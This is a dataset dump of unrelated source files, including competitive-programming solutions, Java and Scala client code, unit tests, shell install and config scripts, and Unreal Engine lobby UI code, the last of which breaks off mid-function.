text
stringlengths 1
1.05M
|
|---|
<reponame>smac89/UVA-Online-Judge-Problem-Solutions<gh_stars>1-10
#include <iostream>
#include <cstring>
#define FMAX 1e10
using namespace std;
void solve()
{
char req[81], name[81], rfp[] = {"RFP #"};
int n, p, rec, s = 0;
double mprc = FMAX, mrec = 0, prc, temp;
while(cin >> n >> p)
{
if (s++)
if (n) cout << "\n\n";
else break;
cin.ignore(100, '\n');
for (int t = 0; t < n; ++t)
cin.ignore(100, '\n');
while(p--)
{
cin.getline(&req[0], 81, '\n');
cin >> prc >> rec;
temp = (double)rec / n;
if (temp > mrec || (temp == mrec && prc < mprc))
{
strcpy(&name[0], &req[0]);
mrec = temp;
mprc = prc;
}
cin.ignore(100, '\n');
while(rec--) cin.ignore(100, '\n');
}
mprc = FMAX;
mrec = 0;
cout << rfp << s << '\n' << name;
}
cout << '\n';
}
int main()
{
solve();
return 0;
}
|
package service;
import com.google.gson.Gson;
import play.libs.F.Promise;
import play.libs.ws.WS;
import play.libs.ws.WSResponse;
import utils.Urls;
import utils.Utils;
/*
* @Author(name="<NAME>")
*/
public class RestService {
public enum restServiceEnum {GET, POST, PUT, DELETE}
// Call the REST api ******************************************************************************************************
public static WSResponse callREST(String requestUrl, String requestJson, Class requestJsonClass, Boolean contentJson, restServiceEnum httpMetod){
String url = Utils.getApiUrl();
if(requestUrl != null) url += requestUrl;
String request = null;
if((httpMetod != null) && (contentJson != null)){
System.out.println("In not null");
try{
Promise<WSResponse> result = null;
if(contentJson.equals(true)){
// For GET method ________________________________________________________________
if(httpMetod.equals(restServiceEnum.GET)){
result = WS .url(url)
.setContentType(Urls.CONTENT_TYPE_JSON)
//.setAuth(Utils.getAuthenticationHeader())
.get();
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For POST method _______________________________________________________________
if(httpMetod.equals(restServiceEnum.POST)){
result = WS .url(url)
.setContentType(Urls.CONTENT_TYPE_JSON)
//.setAuth(Utils.getAuthenticationHeader())
.post(requestJson);
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For PUT method ________________________________________________________________
if(httpMetod.equals(restServiceEnum.PUT)){
result = WS .url(url)
.setContentType(Urls.CONTENT_TYPE_JSON)
//.setAuth(Utils.getAuthenticationHeader())
.put(requestJson);
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For DELETE method ______________________________________________________________
if(httpMetod.equals(restServiceEnum.DELETE)){
result = WS .url(url)
.setContentType(Urls.CONTENT_TYPE_JSON)
//.setAuth(Utils.getAuthenticationHeader())
.delete();
return result.get(Utils.WAIT_FOR_RESPONSE);
}
} else{ //*************************************************************************************************************************************
// For GET method without content header___________________________________________
if(httpMetod.equals(restServiceEnum.GET)){
result = WS .url(url)
//.setAuth(Utils.getAuthenticationHeader())
.get();
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For POST method without content header__________________________________________
if(httpMetod.equals(restServiceEnum.POST)){
result = WS .url(url)
//.setAuth(Utils.getAuthenticationHeader())
.post(requestJson);
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For PUT method without content header___________________________________________
if(httpMetod.equals(restServiceEnum.PUT)){
result = WS .url(url)
//.setAuth(Utils.getAuthenticationHeader())
.put(requestJson);
return result.get(Utils.WAIT_FOR_RESPONSE);
}
// For DELETE method without content header________________________________________
if(httpMetod.equals(restServiceEnum.DELETE)){
result = WS .url(url)
//.setAuth(Utils.getAuthenticationHeader())
.delete();
return result.get(Utils.WAIT_FOR_RESPONSE);
}
}
} catch(Exception exception){
return null;
}
}
return null;
}
}
|
<gh_stars>0
/*
* Copyright (c) 2015 IBM Corporation and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.brunel.build.util;
import org.brunel.data.Dataset;
/**
* Interface defining a caching mechanism to cache Dataset instances by a key name. Implementations
* can be set using DataCache.useCache().
* @author drope
*
*/
public interface DatasetCache {
/**
* Store a given data set using the given key
* @param key unique key
* @param dataset the Dataset instance to store in the cache
*/
public void store(String key, Dataset dataset);
/**
* Retrieve a Dataset instance given a key
* @param key the key
* @return the Dataset instance for the given key
*/
public Dataset retrieve(String key);
}
|
// http://codeforces.com/contest/935/problem/C
#include <bits/stdc++.h>
using namespace std;
typedef complex<double> p;
int main() {
double R, x1, y1, x2, y2;
cin >> R >> x1 >> y1 >> x2 >> y2;
p p1 = {x1, y1};
p p2 = {x2, y2};
p p3 = p1 - p2;
double d = abs(p3);
cout << fixed << setprecision(17) ;
if (p1 == p2) cout << x1 + R/2 << " " << y1 << " " << R/2 << endl;
else if (d >= R) cout << x1 << " " << y1 << " " << R << endl;
else {
double r = (d + R) / 2;
p1 += p3/d * ((R - d) / 2);
cout << p1.real() << " " << p1.imag() << " " << r << endl;
}
}
|
print("Welcome to the store!")
print("Choose a product:")
products = ["Milk", "Bread", "Chips", "Cheese"]
for i, product in enumerate(products):
print(str(i+1) + ": " + product)
selection = input("Select one: ")
print(products[int(selection)-1])
|
<reponame>NIRALUser/BatchMake
/*
* Note: This is only required if you use curl 7.8 or lower, later
* versions provide an option to curl_global_init() that does the
* win32 initialization for you.
*/
/*
* These are example functions doing socket init that Windows
* require. If you don't use windows, you can safely ignore this crap.
*/
#include <windows.h>
void win32_cleanup(void)
{
WSACleanup();
}
int win32_init(void)
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
return 1;
/* Confirm that the Windows Sockets DLL supports 1.1.*/
/* Note that if the DLL supports versions greater */
/* than 1.1 in addition to 1.1, it will still return */
/* 1.1 in wVersion since that is the version we */
/* requested. */
if ( LOBYTE( wsaData.wVersion ) != 1 ||
HIBYTE( wsaData.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return 1;
}
return 0; /* 0 is ok */
}
|
<filename>src/test/java/com/keildraco/config/tests/states/ListParserTest.java
package com.keildraco.config.tests.states;
import static com.keildraco.config.testsupport.SupportClass.runParser;
import static org.junit.jupiter.api.Assertions.assertAll;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.Assertions.fail;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URISyntaxException;
import java.util.Arrays;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestInstance;
import org.junit.jupiter.api.TestInstance.Lifecycle;
import com.keildraco.config.Config;
import com.keildraco.config.exceptions.GenericParseException;
import com.keildraco.config.exceptions.IllegalParserStateException;
import com.keildraco.config.exceptions.UnknownStateException;
import com.keildraco.config.factory.TypeFactory;
import com.keildraco.config.interfaces.ParserInternalTypeBase;
import com.keildraco.config.states.ListParser;
import static com.keildraco.config.data.Constants.ParserNames.LIST;
/**
*
* @author <NAME>
*
*/
@TestInstance(Lifecycle.PER_CLASS)
final class ListParserTest {
private static final String CAUGHT_EXCEPTION = "Caught exception running loadFile: ";
private static final String EXCEPTION_GETTING = "Exception getting type instance for {}: {}";
/**
*
* @throws NoSuchMethodException
* @throws InstantiationException
* @throws IllegalAccessException
* @throws InvocationTargetException
*/
@BeforeAll
void setUp() throws NoSuchMethodException, InstantiationException, IllegalAccessException,
InvocationTargetException {
Config.reset();
Config.registerKnownParts();
}
/**
*
*/
@Test
void testGetState() {
try {
final ParserInternalTypeBase pb = runParser("[ alpha, beta, charlie(! delta) ]", LIST);
assertAll("result is correct", () -> assertNotNull(pb, "result not null"),
() -> assertTrue(pb.has("alpha"), "has member named alpha"),
() -> assertFalse(pb.has("bravo"), "has no member named bravo"));
} catch (final IOException | IllegalArgumentException | IllegalParserStateException
| UnknownStateException | GenericParseException | NoSuchMethodException
| InstantiationException | IllegalAccessException | InvocationTargetException
| URISyntaxException e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
*
*/
@Test
void testListParser() {
try {
final TypeFactory tf = new TypeFactory();
final ListParser op = new ListParser(tf, null);
assertNotNull(op, "Able to instantiate a ListParser");
} catch (final Exception e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
*
*/
@Test
void testRegisterTransitions() {
try {
final TypeFactory tf = new TypeFactory();
final ListParser op = new ListParser(tf, null);
op.registerTransitions(tf);
assertTrue(true, "was able to register transitions");
} catch (final Exception e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
*
*/
@Test
void testErrorNoData() {
assertThrows(IllegalParserStateException.class, () -> runParser("", LIST));
}
/**
*
*/
@Test
void testErrorBadData() {
assertThrows(GenericParseException.class, () -> runParser("[ a, ( ]", LIST));
}
/**
*
*/
@Test
void testErrorEarlyEOF() {
assertThrows(GenericParseException.class, () -> runParser("[ ash, blood, choices", LIST));
}
}
|
<Window x:Class="Window1"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Title="Window1" Height="150" Width="200">
<Grid>
<TextBox Name="textBox1"></TextBox>
<Button Name="button1" Click="Button_Click">Button</Button>
</Grid>
</Window>
|
<gh_stars>1-10
package com.assist.watchnext.model.tmdb;
import java.util.List;
public class TmdbMovie {
private String poster_path;
private List<TmdbGenre> genres;
private String homepage;
private String imdb_id;
private String original_title;
private String overview;
private String release_date;
private float vote_average;
private TmdbTrailerList videos;
private String original_language;
public String getOriginal_language() {
return original_language;
}
public void setOriginal_language(String original_language) {
this.original_language = original_language;
}
public TmdbMovie() {}
public TmdbMovie(String poster_path, List<TmdbGenre> genres, String homepage, String imdb_id, String original_title, String overview, String release_date, float vote_average, TmdbTrailerList videos, String original_language) {
this.poster_path = poster_path;
this.genres = genres;
this.homepage = homepage;
this.imdb_id = imdb_id;
this.original_title = original_title;
this.overview = overview;
this.release_date = release_date;
this.vote_average = vote_average;
this.videos = videos;
this.original_language = original_language;
}
public String getPoster_path() {
return poster_path;
}
public void setPoster_path(String poster_path) {
this.poster_path = poster_path;
}
public List<TmdbGenre> getGenres() {
return genres;
}
public void setGenres(List<TmdbGenre> genres) {
this.genres = genres;
}
public String getHomepage() {
return homepage;
}
public void setHomepage(String homepage) {
this.homepage = homepage;
}
public String getImdb_id() {
return imdb_id;
}
public void setImdb_id(String imdb_id) {
this.imdb_id = imdb_id;
}
public String getOriginal_title() {
return original_title;
}
public void setOriginal_title(String original_title) {
this.original_title = original_title;
}
public String getOverview() {
return overview;
}
public void setOverview(String overview) {
this.overview = overview;
}
public String getRelease_date() {
return release_date;
}
public void setRelease_date(String release_date) {
this.release_date = release_date;
}
public float getVote_average() {
return vote_average;
}
public void setVote_average(float vote_average) {
this.vote_average = vote_average;
}
public TmdbTrailerList getVideos() {
return videos;
}
@Override
public String toString() {
return "TmdbMovie{" +
"poster_path='" + poster_path + '\'' +
", genres=" + genres +
", homepage='" + homepage + '\'' +
", imdb_id='" + imdb_id + '\'' +
", original_title='" + original_title + '\'' +
", overview='" + overview + '\'' +
", release_date='" + release_date + '\'' +
", vote_average=" + vote_average +
", videos=" + videos +
", original_language='" + original_language + '\'' +
'}';
}
public void setVideos(TmdbTrailerList videos) {
this.videos = videos;
}
}
|
export type Constructor<T = unknown> = new (
// eslint-disable-next-line @typescript-eslint/no-explicit-any
...args: any[]
) => T
|
from typing import List, Tuple
class SeamProcessor:
def __init__(self, image: List[List[int]]):
self.image = image
def calculate_energy(self) -> List[List[int]]:
energy_map = [[0 for _ in range(len(self.image[0]))] for _ in range(len(self.image))]
# Calculate energy map based on specified algorithm
# Populate energy_map with calculated energy values
return energy_map
def find_seam(self) -> List[Tuple[int, int]]:
# Use dynamic programming or other suitable algorithm to find seam with lowest energy cost
seam = [] # Replace with actual seam coordinates
return seam
def remove_seam(self, seam: List[Tuple[int, int]]) -> None:
for row, col in seam:
del self.image[row][col]
|
<gh_stars>0
class MigrateRunVideoUrlsToVideos < ActiveRecord::Migration[6.0]
# video_url is included in ignored_columns in Run, so we can't use standard ActiveRecord stuff to create Videos or rollback the migration
def up
sql = "INSERT INTO videos (run_id, url, created_at, updated_at)
SELECT id, video_url, now(), now()
FROM runs
WHERE
video_url IS NOT NULL
AND video_url <> ''
".squish
ActiveRecord::Base.connection.exec_insert(sql)
end
def down
sql = "UPDATE runs
SET video_url = videos.url
FROM videos
WHERE videos.run_id = runs.id
".squish
ActiveRecord::Base.connection.exec_update(sql)
end
end
|
<reponame>basicarrero/pyplsqlparser<gh_stars>1-10
class CaseChangingStream():
def __init__(self, stream, upper):
self._stream = stream
self._upper = upper
def __getattr__(self, name):
return self._stream.__getattribute__(name)
def LA(self, offset):
c = self._stream.LA(offset)
if c <= 0:
return c
return ord(chr(c).upper() if self._upper else chr(c).lower())
def getText(self, start, stop):
text = self._stream.getText(start, stop)
return text.upper() if self._upper else text.lower()
|
MIGRATION_ISSUES_DETAILS["0785d94d-b39c-4d3f-9127-df45b30e6cda"] = [
{description: "<p>The application embeds the Spring Boot framework.<\/p>", ruleID: "3rd-party-03000", issueName: "Embedded framework - Spring Boot",
problemSummaryID: "0785d94d-b39c-4d3f-9127-df45b30e6cda", files: [
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-actuator-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-actuator-autoconfigure-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-jarmode-layertools-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-autoconfigure-2.4.2.jar", oc:"1"},
], resourceLinks: [
]},
];
onProblemSummaryLoaded("0785d94d-b39c-4d3f-9127-df45b30e6cda");
|
#!/bin/bash
set -e
. ./lib/env.sh
ts=`date '+%s'`
# チームのチャンネルID取得
# 一日に一回でいい
# tested
get_channels_id() {
channel_name=$slack_channel
if [ $# -eq 1 ]; then
channel_name=$1
fi
channels_list_file="tmp/channels_list.json"
channels_list_ts=0
if [ -e $channels_list_file ]; then
channels_list_ts=`date '+%s' -r $channels_list_file`
fi
# ファイルのタイムスタンプが一日経過しているか
channels_list_diff=$((ts - channels_list_ts))
if [ $channels_list_diff -gt 86400 ]; then
# 全チャンネルの一覧を取得
channels_list=`wget -q -O - --post-data "token=${slack_token}&exclude_archived=true" https://slack.com/api/channels.list`
# ファイルにキャッシュ
echo $channels_list > $channels_list_file
else
# キャッシュを復元
channels_list=`cat $channels_list_file`
fi
# channels_listをslack_channelで絞り込んでchannels_idを得る
channels_id=`echo $channels_list | jq '.channels[] | select(.name == "'${channel_name}'")' | jq .id`
channels_id=${channels_id:1:-1}
echo $channels_id
return 0
}
# チャンネルのメンバー取得
# 十分間に一回でいい
# tested
get_members_list() {
channels_id=$1
members_list_file="tmp/members_list.json"
members_list_ts=0
if [ -e $members_list_file ]; then
members_list_ts=`date '+%s' -r $members_list_file`
fi
# ファイルのタイムスタンプが十分間経過しているか
members_list_diff=$((ts - members_list_ts))
if [ $members_list_diff -gt 600 ]; then
# channels_idのチャンネルの詳細情報を取得
channels_info=`wget -q -O - --post-data "token=${slack_token}&channel=${channels_id}" https://slack.com/api/channels.info`
# channels_infoからメンバー一覧を取り出す
members_list=`echo $channels_info | jq .channel.members[]`
# ファイルにキャッシュ
echo $members_list > $members_list_file
else
# キャッシュから復元
members_list=`cat $members_list_file`
fi
echo $members_list
return 0
}
open_im() {
member_id=$1
im_open=`wget -q -O - --post-data "token=${slack_token}&user=${member_id}" https://slack.com/api/im.open`
echo $im_open > ./tmp/im_open.json
im_id=`echo $im_open | jq .channel.id`
im_id=${im_id:1:-1}
echo $im_id
}
|
#!/bin/bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
echo "init env variables"
# Define parameters default value.
#============================================================================
# Database Source
#============================================================================
export DATABASE_HOST=${DATABASE_HOST:-"127.0.0.1"}
export DATABASE_PORT=${DATABASE_PORT:-"5432"}
export DATABASE_USERNAME=${DATABASE_USERNAME:-"root"}
export DATABASE_PASSWORD=${DATABASE_PASSWORD:-"root"}
export DATABASE_DATABASE=${DATABASE_DATABASE:-"dolphinscheduler"}
export DATABASE_TYPE=${DATABASE_TYPE:-"postgresql"}
export DATABASE_DRIVER=${DATABASE_DRIVER:-"org.postgresql.Driver"}
export DATABASE_PARAMS=${DATABASE_PARAMS:-"characterEncoding=utf8"}
#============================================================================
# System
#============================================================================
export DOLPHINSCHEDULER_ENV_PATH=${DOLPHINSCHEDULER_ENV_PATH:-"/opt/dolphinscheduler/conf/env/dolphinscheduler_env.sh"}
export DOLPHINSCHEDULER_DATA_BASEDIR_PATH=${DOLPHINSCHEDULER_DATA_BASEDIR_PATH:-"/tmp/dolphinscheduler"}
export DOLPHINSCHEDULER_OPTS=${DOLPHINSCHEDULER_OPTS:-""}
export RESOURCE_STORAGE_TYPE=${RESOURCE_STORAGE_TYPE:-"NONE"}
export RESOURCE_UPLOAD_PATH=${RESOURCE_UPLOAD_PATH:-"/ds"}
export FS_DEFAULT_FS=${FS_DEFAULT_FS:-"s3a://xxxx"}
export FS_S3A_ENDPOINT=${FS_S3A_ENDPOINT:-"s3.xxx.amazonaws.com"}
export FS_S3A_ACCESS_KEY=${FS_S3A_ACCESS_KEY:-"xxxxxxx"}
export FS_S3A_SECRET_KEY=${FS_S3A_SECRET_KEY:-"xxxxxxx"}
#============================================================================
# Zookeeper
#============================================================================
export ZOOKEEPER_QUORUM=${ZOOKEEPER_QUORUM:-"127.0.0.1:2181"}
export ZOOKEEPER_ROOT=${ZOOKEEPER_ROOT:-"/dolphinscheduler"}
#============================================================================
# Master Server
#============================================================================
export MASTER_EXEC_THREADS=${MASTER_EXEC_THREADS:-"100"}
export MASTER_EXEC_TASK_NUM=${MASTER_EXEC_TASK_NUM:-"20"}
export MASTER_HEARTBEAT_INTERVAL=${MASTER_HEARTBEAT_INTERVAL:-"10"}
export MASTER_TASK_COMMIT_RETRYTIMES=${MASTER_TASK_COMMIT_RETRYTIMES:-"5"}
export MASTER_TASK_COMMIT_INTERVAL=${MASTER_TASK_COMMIT_INTERVAL:-"1000"}
export MASTER_MAX_CPULOAD_AVG=${MASTER_MAX_CPULOAD_AVG:-"100"}
export MASTER_RESERVED_MEMORY=${MASTER_RESERVED_MEMORY:-"0.1"}
export MASTER_LISTEN_PORT=${MASTER_LISTEN_PORT:-"5678"}
#============================================================================
# Worker Server
#============================================================================
export WORKER_EXEC_THREADS=${WORKER_EXEC_THREADS:-"100"}
export WORKER_HEARTBEAT_INTERVAL=${WORKER_HEARTBEAT_INTERVAL:-"10"}
export WORKER_FETCH_TASK_NUM=${WORKER_FETCH_TASK_NUM:-"3"}
export WORKER_MAX_CPULOAD_AVG=${WORKER_MAX_CPULOAD_AVG:-"100"}
export WORKER_RESERVED_MEMORY=${WORKER_RESERVED_MEMORY:-"0.1"}
export WORKER_LISTEN_PORT=${WORKER_LISTEN_PORT:-"1234"}
export WORKER_GROUP=${WORKER_GROUP:-"default"}
export WORKER_WEIGHT=${WORKER_WEIGHT:-"100"}
#============================================================================
# Alert Server
#============================================================================
# alert plugin dir
export ALERT_PLUGIN_DIR=${ALERT_PLUGIN_DIR:-"/opt/dolphinscheduler"}
# XLS FILE
export XLS_FILE_PATH=${XLS_FILE_PATH:-"/tmp/xls"}
# mail
export MAIL_SERVER_HOST=${MAIL_SERVER_HOST:-""}
export MAIL_SERVER_PORT=${MAIL_SERVER_PORT:-""}
export MAIL_SENDER=${MAIL_SENDER:-""}
export MAIL_USER=${MAIL_USER:-""}
export MAIL_PASSWD=${MAIL_PASSWD:-""}
export MAIL_SMTP_STARTTLS_ENABLE=${MAIL_SMTP_STARTTLS_ENABLE:-"true"}
export MAIL_SMTP_SSL_ENABLE=${MAIL_SMTP_SSL_ENABLE:-"false"}
export MAIL_SMTP_SSL_TRUST=${MAIL_SMTP_SSL_TRUST:-""}
# wechat
export ENTERPRISE_WECHAT_ENABLE=${ENTERPRISE_WECHAT_ENABLE:-"false"}
export ENTERPRISE_WECHAT_CORP_ID=${ENTERPRISE_WECHAT_CORP_ID:-""}
export ENTERPRISE_WECHAT_SECRET=${ENTERPRISE_WECHAT_SECRET:-""}
export ENTERPRISE_WECHAT_AGENT_ID=${ENTERPRISE_WECHAT_AGENT_ID:-""}
export ENTERPRISE_WECHAT_USERS=${ENTERPRISE_WECHAT_USERS:-""}
#============================================================================
# Frontend
#============================================================================
export FRONTEND_API_SERVER_HOST=${FRONTEND_API_SERVER_HOST:-"127.0.0.1"}
export FRONTEND_API_SERVER_PORT=${FRONTEND_API_SERVER_PORT:-"12345"}
echo "generate app config"
ls ${DOLPHINSCHEDULER_HOME}/conf/ | grep ".tpl" | while read line; do
eval "cat << EOF
$(cat ${DOLPHINSCHEDULER_HOME}/conf/${line})
EOF
" > ${DOLPHINSCHEDULER_HOME}/conf/${line%.*}
done
echo "generate nginx config"
sed -i "s/FRONTEND_API_SERVER_HOST/${FRONTEND_API_SERVER_HOST}/g" /etc/nginx/conf.d/dolphinscheduler.conf
sed -i "s/FRONTEND_API_SERVER_PORT/${FRONTEND_API_SERVER_PORT}/g" /etc/nginx/conf.d/dolphinscheduler.conf
|
#include <iostream>
#include <random>
//Function to simulate a dice roll
int roll_dice()
{
std:: random_device rd;
std::mt19937 gen(rd());
std::uniform_int_distribution<> dist(1, 6);
return dist(gen);
}
int main() {
int result = roll_dice();
std::cout << result << std::endl;
}
|
#!/bin/bash
SCRIPT=$(readlink -f $0)
ROOTDIR=`dirname $SCRIPT`
dispatcherPID=`cat $ROOTDIR/dispatcher.pid`
if ps -p $dispatcherPID > /dev/null; then
#echo -e "Dispatcher Run"
exit
else
#echo -e "Started dispatcher"
nohup $ROOTDIR/dispatcher.sh &
#cho -e "Dispatcher status : \e[31mStopped\e[0m"
fi
|
#!/usr/bin/env bash
# Copyright 2015 Johns Hopkins University (author: Jan Trmal)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
#
# This script attempts to install mpg123, which can be used for decoding
# mp2 and mp3 file formats.
VERSION=1.21.0
WGET=${WGET:-wget}
errcho() { echo "$@" 1>&2; }
errcho "****() Installing MPG123"
if [ ! -e mpg123-$VERSION.tar.bz2 ]; then
errcho "Could not find the tarball mpg123-$VERSION.tar.bz2"
if [ -d "$DOWNLOAD_DIR" ]; then
cp -p "$DOWNLOAD_DIR/mpg123-$VERSION.tar.bz2" .
else
if ! $WGET --version >&/dev/null; then
errcho "This script requires you to first install wget"
errcho "You can also just download mpg123-$VERSION.tar.bz2 from"
errcho "https://www.mpg123.org/download.shtml"
errcho "and run this installation script again"
exit 1
fi
$WGET -T 10 -t 3 -c "https://downloads.sourceforge.net/project/mpg123/mpg123/$VERSION/mpg123-$VERSION.tar.bz2"
fi
if [ ! -e mpg123-$VERSION.tar.bz2 ]; then
errcho "Download of mpg123-$VERSION.tar.bz2 failed!"
errcho "You can also just download mpg123-$VERSION.tar.bz2 from"
errcho "https://www.mpg123.org/download.shtml"
errcho "and run this installation script again"
exit 1
fi
fi
tar xjf mpg123-$VERSION.tar.bz2 || exit 1
rm -fr mpg123
ln -s mpg123-$VERSION mpg123
(
cd mpg123
./configure --prefix `pwd` --with-default-audio=dummy --enable-static --disable-shared
make; make install
)
(
set +u
[ ! -z "${MPG123}" ] && \
echo >&2 "MPG123 variable is aleady defined. Undefining..." && \
unset MPG123
[ -f ./env.sh ] && . ./env.sh
[ ! -z "${MPG123}" ] && \
echo >&2 "MPG123 config is already in env.sh" && exit
wd=`pwd`
wd=`readlink -f $wd || pwd`
echo "export MPG123=$wd/mpg123"
echo "export PATH=\${PATH}:\${MPG123}/bin"
) >> env.sh
echo >&2 "Installation of MPG123 finished successfully"
echo >&2 "Please source the tools/extras/env.sh in your path.sh to enable it"
|
import io.chrisdavenport.rediculous._
import cats.implicits._
import cats.effect._
import fs2.io.net._
import com.comcast.ip4s._
// Send a Single Transaction to the Redis Server
object TransactionExample extends IOApp {
def run(args: List[String]): IO[ExitCode] = {
val r = for {
// maxQueued: How many elements before new submissions semantically block. Tradeoff of memory to queue jobs.
// Default 1000 is good for small servers. But can easily take 100,000.
// workers: How many threads will process pipelined messages.
connection <- RedisConnection.queued[IO].withMaxQueued(maxQueued = 10000).build
} yield connection
r.use {client =>
val r = (
RedisCommands.ping[RedisTransaction],
RedisCommands.del[RedisTransaction]("foo"),
RedisCommands.get[RedisTransaction]("foo"),
RedisCommands.set[RedisTransaction]("foo", "value"),
RedisCommands.get[RedisTransaction]("foo")
).tupled
val multi = r.transact[IO]
multi.run(client).flatTap(output => IO(println(output)))
}.as(ExitCode.Success)
}
}
|
<gh_stars>0
// Fill out your copyright notice in the Description page of Project Settings.
#include "LobbyPlayerController.h"
#include "JamGameInstance.h"
#include "Runtime/UMG/Public/Blueprint/UserWidget.h"
void ALobbyPlayerController::SetupLobbyUI()
{
if (IsLocalPlayerController())
{
if (LobbyHUDWidgetClass && InLobbyMenuWidgetClass)
{
LobbyHUDWidget = UUserWidget::CreateWidgetOfClass(LobbyHUDWidgetClass.Get(), GetGameInstance(), GetWorld(), this); // Create Widget
if (LobbyHUDWidget)
{
LobbyHUDWidget->AddToViewport();
LobbyHUDWidget->SetVisibility(ESlateVisibility::Visible);
}
InLobbyMenuWidget = UUserWidget::CreateWidgetOfClass(InLobbyMenuWidgetClass.Get(), GetGameInstance(), GetWorld(), this); // Create Widget
if (InLobbyMenuWidget)
{
InLobbyMenuWidget->AddToViewport();
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Collapsed);
}
}
}
}
void ALobbyPlayerController::ShowInLobbyMenu()
{
if (InLobbyMenuWidget)
{
if (LobbyHUDWidget)
{
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Visible);
LobbyHUDWidget->SetVisibility(ESlateVisibility::Collapsed);
FInputModeUIOnly Mode;
Mode.SetLockMouseToViewportBehavior(EMouseLockMode::DoNotLock);
SetInputMode(Mode);
bShowMouseCursor = true;
}
}
}
void ALobbyPlayerController::HideInLobbyMenu()
{
if (InLobbyMenuWidget)
{
if (LobbyHUDWidget)
{
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Collapsed);
LobbyHUDWidget->SetVisibility(ESlateVisibility::Visible);
FInputModeUIOnly Mode;
Mode.SetLockMouseToViewportBehavior(EMouseLockMode::DoNotLock);
SetInputMode(Mode);
bShowMouseCursor = true;
}
}
}
bool ALobbyPlayerController::IsLobbyUIInitialized() const
{
return LobbyHUDWidget != nullptr && InLobbyMenuWidget != nullptr;
}
bool ALobbyPlayerController::IsInLobbyMenuCollapsed() const
{
return IsLobbyUIInitialized() && InLobbyMenuWidget->GetVisibility() == ESlateVisibility::Collapsed;
}
void ALobbyPlayerController::RemoveLobbyWidgets_Implementation()
{
if (GetLobbyHUDWidget())
{
GetLobbyHUDWidget()->SetVisibility(ESlateVisibility::Collapsed);
}
if (GetInLobbyMenuWidget())
{
GetInLobbyMenuWidget()->SetVisibility(ESlateVisibility::Collapsed);
}
FInputModeGameOnly Mode{};
Mode.SetConsumeCaptureMouseDown(false);
SetInputMode(Mode);
bShowMouseCursor = false;
UJamGameInstance* GI{ Cast<UJamGameInstance>(GetGameInstance()) };
if (ensure(GI))
{
GI->LobbyUpdatePlayersMonsterStatusLocal();
}
}
|
#include <iostream>
#include <string>
class PaginateProjectRequest {
private:
std::string appName_;
public:
void setAppName(const std::string& appName) {
appName_ = appName;
setBodyParameter("AppName", appName);
}
std::string get_NameSpace() const {
// Implement logic to retrieve namespace
return "namespace_for_" + appName_; // Sample implementation
}
void setBodyParameter(const std::string& key, const std::string& value) {
// Implement setting body parameter logic
